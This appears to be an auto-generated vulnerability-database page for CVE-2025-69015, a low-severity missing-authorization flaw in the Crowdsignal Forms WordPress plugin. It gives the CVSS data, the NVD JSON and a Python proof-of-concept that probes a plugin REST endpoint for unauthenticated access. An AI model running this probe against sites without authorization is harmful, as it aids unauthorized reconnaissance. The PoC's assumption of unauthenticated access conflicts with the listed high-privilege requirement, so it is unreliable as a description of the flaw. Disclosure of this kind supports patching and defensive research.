Security Vulnerability Report
中文
CVE-2025-69015 CVSS 3.8 LOW

CVE-2025-69015

Published: 2025-12-30 11:16:00
Last Modified: 2026-04-27 20:16:25

Description

Missing Authorization vulnerability in Automattic Crowdsignal Forms crowdsignal-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Crowdsignal Forms: from n/a through <= 1.7.2.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Crowdsignal Forms <= 1.7.2 (WordPress插件)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69015 PoC - Crowdsignal Forms Broken Access Control # Target: WordPress site with Crowdsignal Forms plugin <= 1.7.2 def check_vulnerability(target_url, cookie=None): """ Check if target is vulnerable to CVE-2025-69015 Missing Authorization in Crowdsignal Forms """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } if cookie: headers['Cookie'] = cookie # Check plugin version endpoint version_url = f"{target_url}/wp-json/crowdsignal/v1/settings" try: response = requests.get(version_url, headers=headers, timeout=10) # Vulnerable version returns 200 without proper auth if response.status_code == 200: print(f"[+] Target appears vulnerable - endpoint accessible") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Target may not be vulnerable - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url> [cookie]") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else None check_vulnerability(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69015", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:59.770", "lastModified": "2026-04-27T20:16:25.047", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Automattic Crowdsignal Forms crowdsignal-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Crowdsignal Forms: from n/a through <= 1.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/crowdsignal-forms/vulnerability/wordpress-crowdsignal-forms-plugin-1-7-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}